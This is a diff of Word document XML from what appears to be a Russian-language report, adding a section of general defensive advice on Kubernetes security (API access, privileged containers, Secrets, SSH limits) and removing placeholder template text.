+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="_Toc231073619"/>
+      <w:r>
+        <w:t>вопросы безопасности контейнеризации</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Безопасность </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>является критическим вопросом при эксплуатации кластеров с контейнерами. Правильно настроенные компоненты позволяют избежать утечки конфидециальных данных</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Так как существует четкое разделение компонентов по работе с публичными и конфидециальными данными, а также наличие главной ноды с уровнем привилегий администратора, безопасность </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>является критическим аспектом при разработке решения на основе кластера.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Основные риски безопасности </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">связанны с работой главной ноды, так как она содержит прямой доступ к </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>API</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">сервиса. Для безопасности следует ограничить доступ к </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>API</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Server</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>с помощью аутентификации и сетевыми ограничениями.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Также стоит запретить запуск контейнеров, имеющих привилегии, особенно </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>root</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>права</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, дабы избежать возможных инъекий.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Для безопасной работы </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>pod</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ов стоит соблюдать </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Pod</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Standarts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Также настроить </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>requests</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>limits</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">по </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CPU</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">и памяти, чтобы </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>pod</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>не смог перегрузить серверные ресурсы и не нарушить работу всего кластера.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Еще необходимо хранить конфидециальную информацию только в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secrets</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">а также ограничить доступ к </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3191,40 +4053,76 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>сервера в незашифрованном виде.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Beginingtitlelist"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Volume</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Volume</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">объект </w:t>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">элементу главной ноды, где хранятся незашифрованные данные из </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secrets</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Прямые </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SSH</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>доступы к узлам необходимо ограничивать.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Для повышения отказоустойчивости следует грамотно настроить </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>servive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>основные каналы связи для рабочих нод</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Таким образом безопасность </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3233,1438 +4131,25 @@
         <w:t>Kubernetes</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">который служит для связи с внешними дисками машины ноды. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Volume</w:t>
-      </w:r>
-      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">предназначен для локального хранения информации внутри ноды. Также объект </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Volume </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">находитя вне самого кластера </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubernetes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>напрямую зависит от процесса эксплуатации. Из-за того, что один кластер контроллирует работу целой экосистемы микросервисов, очень важно соблюдать правила безопасного хранения данных, а также следить за привилегиями рабочих нод и прямого доступа к ним.</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Подраздел 2</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>п</w:t>
-      </w:r>
-      <w:r>
-        <w:t>еречисление перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="0"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc210601677"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Подраздел 3</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc210601678"/>
-      <w:r>
-        <w:t>Подраздел 3 уровня 1</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
